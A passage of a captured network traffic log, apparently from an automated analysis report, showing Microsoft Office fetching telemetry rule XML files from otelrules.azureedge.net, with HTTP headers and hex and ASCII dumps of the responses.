                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:56 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    123192.168.2.64982913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:57 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1425
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 577422f4-d01e-00ad-48c3-45e942000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010057Z-174f7845968px8v7hC1EWR08ng000000171g000000003c5e
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    124192.168.2.64983013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:57 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1388
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2b71c36d-501e-008c-14c5-45cd39000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010057Z-1746fd949bdwt8wrhC1EWRu6rg00000000n000000000burn
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    125192.168.2.64983113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:57 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: cf7e946f-901e-0083-4991-3fbb55000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010057Z-174f7845968xr5c2hC1EWRd0hn0000000rng000000003wet
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    126192.168.2.64983213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:58 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1378
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 00b55cb5-a01e-000d-73cc-45d1ea000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010059Z-1746fd949bdjrnwqhC1EWRpg2800000000e0000000004hte
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:59 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    127192.168.2.64983313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:59 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1405
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4a855f25-e01e-0099-02ce-45da8a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010059Z-1746fd949bd54zxghC1EWRzre400000000ug000000003z0g
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    128192.168.2.64983413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:59 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:00 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1368
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 224e79cf-701e-0050-75c2-456767000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010100Z-1746fd949bddgsvjhC1EWRum2c00000000pg00000000mhcd
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    129192.168.2.64983513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:59 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:00 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 49af129b-801e-00a3-1af3-447cfb000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010100Z-174f784596886s2bhC1EWR743w00000016p000000000nda2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    130192.168.2.64983613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:00 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:01:00 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1378
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 105c57aa-001e-0046-11cb-45da4b000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010100Z-1746fd949bdkw94lhC1EWRxuz400000000m000000000c2bt
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:01:01 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    131192.168.2.64983713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
